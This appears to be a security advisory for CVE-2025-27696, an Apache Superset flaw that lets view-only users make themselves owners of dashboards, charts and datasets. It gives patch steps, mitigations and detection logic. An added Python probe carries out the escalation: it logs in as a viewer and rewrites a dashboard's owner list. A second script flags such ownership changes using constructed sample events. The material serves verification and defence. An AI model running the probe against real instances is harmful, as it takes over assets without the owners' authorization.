CVE-2025-27696

8.8 HIGH

📋 TL;DR

CVE-2025-27696 is an improper-authorization flaw in Apache Superset: an authenticated user who can only view a dashboard, chart or dataset can still change its owner list, for example by adding their own account. Ownership is what gates editing and deleting in Superset, so a read-only user who makes themselves an owner can then modify or delete business-intelligence assets they were only meant to see. All Apache Superset releases through 4.1.1 are affected; 4.1.2 contains the fix.

💻 Affected Systems

Products:
  • Apache Superset
Versions: through 4.1.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Any deployment where non-admin users can authenticate is affected; no configuration setting disables the flaw.

⚠️ Risk & Real-World Impact

🔴 Worst Case

A malicious insider, or an attacker holding any compromised view-only account, adds themselves as owner of every dashboard, chart and dataset they can see, then deletes or rewrites them to disrupt operations or inject misleading content. Owners of a dataset can edit its definition, including the SQL of a virtual dataset, so ownership can also become a path to querying data the viewer was never meant to reach.

🟠 Likely Case

Privilege escalation: a user with view-only access to an asset becomes its owner and gains write and delete rights on it, leaving tampered or missing dashboards, charts and datasets.

🟢 If Mitigated

With tight role assignment and monitoring of ownership changes, impact is limited to unauthorized edits of individual assets that are detected quickly and rolled back from a metadata-database backup.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ❌ No (none known)
Weaponized: UNKNOWN
Unauthenticated Exploit: ❌ No
Complexity: LOW

Requires a valid login with view access to the target asset; any role will do. Once authenticated, exploitation is a single ownership-edit request against the asset.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.1.2 or above

Vendor Advisory: https://lists.apache.org/thread/k2od03bxnxs6vcp80sr03ywcxl194413

Restart Required: Yes

Instructions:

1. Back up the Superset metadata database and configuration (superset_config.py).
2. Stop the Superset service.
3. Upgrade to 4.1.2 or later using pip: pip install --upgrade apache-superset==4.1.2
4. Run database migrations: superset db upgrade
5. Restart the Superset service.

🔧 Temporary Workarounds

Restrict user permissions (applies to: all affected versions)

Temporarily cut every user's role to the minimum it needs while the upgrade is planned: remove accounts that do not need access at all, and keep the owner lists on sensitive dashboards, charts and datasets short. This only shrinks the blast radius; any account that can still view an asset can still trigger the flaw.

🧯 If You Can't Patch

  • Implement strict network segmentation so Superset is reachable only from trusted networks and only by the accounts that need it
  • Enable detailed audit logging for all dashboard/chart/dataset ownership changes and review it daily; Superset's default DBEventLogger records API calls in the logs table of the metadata database

🔍 How to Verify

Check if Vulnerable:

Check Superset version: if version is 4.1.1 or earlier, system is vulnerable.

Check Version:

superset version

Verify Fix Applied:

Confirm the running version is 4.1.2 or later, then test with a low-privilege account: log in as a user who can view but does not own a dashboard, chart or dataset, attempt to change its owner list, and confirm the request is rejected.
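The version check and the low-privilege ownership test above, as a script added to this page (it is not Superset's own code). It assumes a test account that can view the target dashboard but is neither one of its owners nor an admin, and it uses only public REST endpoints: POST /api/v1/security/login for a JWT, GET /api/v1/me/ for our own user id, GET /api/v1/dashboard/<id> to confirm read access, and PUT /api/v1/dashboard/<id> with an owners list. The fake_server transport is constructed for an offline dry run; a 403 on the PUT can also come from a role that simply lacks write access on dashboards, so pair the probe's verdict with the version check.

```python
"""Probe a Superset instance for CVE-2025-27696 (owner change by a viewer).
Hypothetical helper added to this page; not Superset code."""
import json
import re
import urllib.error
import urllib.request

FIXED_VERSION = (4, 1, 2)


def parse_version(text):
    """Return the first X.Y.Z found in e.g. the output of `superset version`."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no X.Y.Z version in %r" % text)
    return tuple(int(g) for g in m.groups())


def version_is_vulnerable(text):
    return parse_version(text) < FIXED_VERSION


def classify_put_status(status):
    """Map the HTTP status of the ownership PUT to a verdict."""
    if status == 200:
        return "VULNERABLE"      # a non-owner rewrote the owner list
    if status in (401, 403):
        return "FIXED"           # rejected; confirm with the version check
    return "INCONCLUSIVE"        # e.g. 404/422: wrong id or schema mismatch


def _call(urlopen, method, url, body=None, token=None):
    """One JSON request; returns (status, parsed body or None)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("Authorization", "Bearer " + token)
    try:
        with urlopen(req) as resp:
            raw = resp.read()
            return resp.status, json.loads(raw) if raw else None
    except urllib.error.HTTPError as err:
        return err.code, None


def probe_owner_change(base_url, username, password, dashboard_id,
                       urlopen=urllib.request.urlopen):
    """Log in as the low-privilege account and try to become an owner."""
    api = base_url.rstrip("/") + "/api/v1"
    status, body = _call(urlopen, "POST", api + "/security/login",
                         {"username": username, "password": password,
                          "provider": "db", "refresh": True})
    if status != 200 or not body or "access_token" not in body:
        raise RuntimeError("login failed (HTTP %s)" % status)
    token = body["access_token"]
    status, body = _call(urlopen, "GET", api + "/me/", token=token)
    if status != 200:
        raise RuntimeError("/api/v1/me/ failed (HTTP %s)" % status)
    my_id = body["result"]["id"]
    status, _ = _call(urlopen, "GET", api + "/dashboard/%d" % dashboard_id,
                      token=token)
    if status != 200:
        return "INCONCLUSIVE"    # the account cannot even read the asset
    status, _ = _call(urlopen, "PUT", api + "/dashboard/%d" % dashboard_id,
                      {"owners": [my_id]}, token=token)
    return classify_put_status(status)


class _FakeResponse:
    """Minimal stand-in for urlopen's response, for the offline dry run."""
    def __init__(self, status, body):
        self.status, self._raw = status, json.dumps(body).encode()
    def read(self):
        return self._raw
    def __enter__(self):
        return self
    def __exit__(self, *exc):
        return False


def fake_server(put_status):
    """Constructed transport replaying a Superset whose PUT answers put_status."""
    def urlopen(req):
        method, url = req.get_method(), req.full_url
        if method == "POST" and url.endswith("/security/login"):
            return _FakeResponse(200, {"access_token": "tok", "refresh_token": "r"})
        if method == "GET" and url.endswith("/me/"):
            return _FakeResponse(200, {"result": {"id": 7, "username": "viewer"}})
        if method == "GET":
            return _FakeResponse(200, {"id": 12, "result": {"owners": [{"id": 1}]}})
        if method == "PUT" and put_status == 200:
            return _FakeResponse(200, {"id": 12, "result": json.loads(req.data)})
        raise urllib.error.HTTPError(url, put_status, "Forbidden", {}, None)
    return urlopen


if __name__ == "__main__":
    # Offline dry run; drop the urlopen= argument to probe a real instance.
    print(probe_owner_change("https://superset.example", "viewer", "pw", 12,
                             urlopen=fake_server(200)))   # VULNERABLE
    print(probe_owner_change("https://superset.example", "viewer", "pw", 12,
                             urlopen=fake_server(403)))   # FIXED
```

Run it against a real instance with the real urlopen (the default) and a throwaway dashboard; a VULNERABLE verdict means the viewer account is now an owner and should be removed again from the dashboard's owner list.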

📡 Detection & Monitoring

Log Indicators:

  • Unexpected ownership changes of dashboards, charts, or datasets, especially an owner list that gains the account that made the change
  • Users whose roles grant only view access performing write operations

Network Indicators:

  • PUT requests to /api/v1/dashboard/<id>, /api/v1/chart/<id> or /api/v1/dataset/<id> from low-privilege accounts

SIEM Query:

source="superset" AND (event="change_ownership" OR event="update_permissions") AND user_role="read_only"

(Illustrative only: field and event names depend on how Superset's event log reaches your SIEM. The stock DBEventLogger stores API calls in the metadata database's logs table with action names such as DashboardRestApi.put, so a real query keys on those actions plus the acting user's role.)
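The log indicator above (an ownership change made by someone who was not an owner), as detection logic added to this page and not taken from Superset. It assumes the events have been normalised from Superset's logs table into rows carrying the acting user name, the action string and the affected object id, and that the owner lists of dashboards, charts and datasets are snapshotted before and after the window (for example via the REST API list endpoints). All records below are constructed.

```python
"""Flag owner-list changes made by non-owners. Added example, not Superset code.
Event rows are a constructed normalisation of Superset's logs table."""

# Action strings the default event logger uses for the REST update endpoints.
PUT_ACTIONS = {
    "DashboardRestApi.put": "dashboard",
    "ChartRestApi.put": "chart",
    "DatasetRestApi.put": "dataset",
}


def find_owner_hijacks(events, owners_before, owners_after, admins=frozenset()):
    """Return one alert per PUT whose actor was neither an owner (per the
    'before' snapshot) nor an admin of an asset whose owner list changed."""
    alerts = []
    for ev in events:
        kind = PUT_ACTIONS.get(ev["action"])
        if kind is None:
            continue                      # reads and unrelated actions
        key = (kind, ev["object_id"])
        before = set(owners_before.get(key, ()))
        after = set(owners_after.get(key, ()))
        if before == after:
            continue                      # no ownership change to explain
        if ev["user"] in before or ev["user"] in admins:
            continue                      # legitimate owner or admin edit
        alerts.append({
            "time": ev["dttm"],
            "user": ev["user"],
            "asset": "%s:%s" % key,
            "added": sorted(after - before),
            "removed": sorted(before - after),
        })
    return alerts


# Constructed sample data: 'viewer' holds a view-only role and owns nothing.
SAMPLE_EVENTS = [
    {"dttm": "2025-04-10T09:12:01", "user": "alice", "action": "DashboardRestApi.put", "object_id": 12},
    {"dttm": "2025-04-10T09:15:44", "user": "viewer", "action": "DashboardRestApi.put", "object_id": 12},
    {"dttm": "2025-04-10T10:02:10", "user": "viewer", "action": "DashboardRestApi.get", "object_id": 12},
    {"dttm": "2025-04-10T11:30:00", "user": "viewer", "action": "DatasetRestApi.put", "object_id": 3},
    {"dttm": "2025-04-10T12:00:00", "user": "admin", "action": "ChartRestApi.put", "object_id": 40},
]
OWNERS_BEFORE = {
    ("dashboard", 12): {"alice"},
    ("dataset", 3): {"bob"},
    ("chart", 40): {"carol"},
}
OWNERS_AFTER = {
    ("dashboard", 12): {"alice", "viewer"},
    ("dataset", 3): {"viewer"},
    ("chart", 40): {"carol", "admin"},
}


def sample_alerts():
    return find_owner_hijacks(SAMPLE_EVENTS, OWNERS_BEFORE, OWNERS_AFTER,
                              admins={"admin"})


if __name__ == "__main__":
    for alert in sample_alerts():
        print(alert)
    # Expect two alerts: viewer on dashboard:12 and viewer on dataset:3.
```

Snapshot granularity matters: with one snapshot per day, a legitimate owner edit and a hijack in the same window both fall on the same before/after pair, and only the non-owner's PUT is flagged. Shorter windows, or logging the owners field of each PUT, make attribution exact.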
